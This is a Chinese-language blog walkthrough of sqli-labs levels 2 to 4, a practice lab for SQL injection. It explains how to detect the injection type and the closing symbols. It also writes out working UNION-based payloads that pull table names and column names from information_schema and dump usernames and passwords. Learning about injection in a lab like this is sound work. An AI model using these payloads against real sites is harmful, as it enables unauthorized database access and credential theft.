sqli-labs注入之2至4关

前言:此部分主要记录sqli-labs闯关2-4,其中我觉得最重要的如何判断闭合符号

sqli-labs注入二至四关

第二关

在这里插入图片描述
首先判断是整形注入还是字符型注入
在这里插入图片描述
在这里插入图片描述
由上图可知为数值型注入,即不需任何闭合符号。
判断列数
在这里插入图片描述
在这里插入图片描述
可知列数为3
判断显示位
在这里插入图片描述
爆出数据库
在这里插入图片描述
由数据库得出表名
?id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=‘security’),3–+
(纯手敲)
在这里插入图片描述
由表名得到列名
?id=-1 union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=‘security’ and table_name=‘users’),3–+
在这里插入图片描述
获取,列中信息
?id=-1 union select 1,(select concat_ws(char(32,58,32),username,password) from users limit 1,1),3–+
在这里插入图片描述

第三关

首先判断
什么类型注入
在这里插入图片描述
在这里插入图片描述
可知为字符型注入,即需判断闭合符号
首先判断‘和"即
在这里插入图片描述
在这里插入图片描述
如果哪个报错,则为那个符号
在输入–+注释符,如果不报错则闭合符号为此符号,如果报错,则再加个括号。
经判断,第三关闭合符号为‘),其余步骤和第一关一样。

第四关

在这里插入图片描述
在这里插入图片描述
经判断为字符型注入
在这里插入图片描述
经判断,闭合符号为”),后面步骤和第一关一样。

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值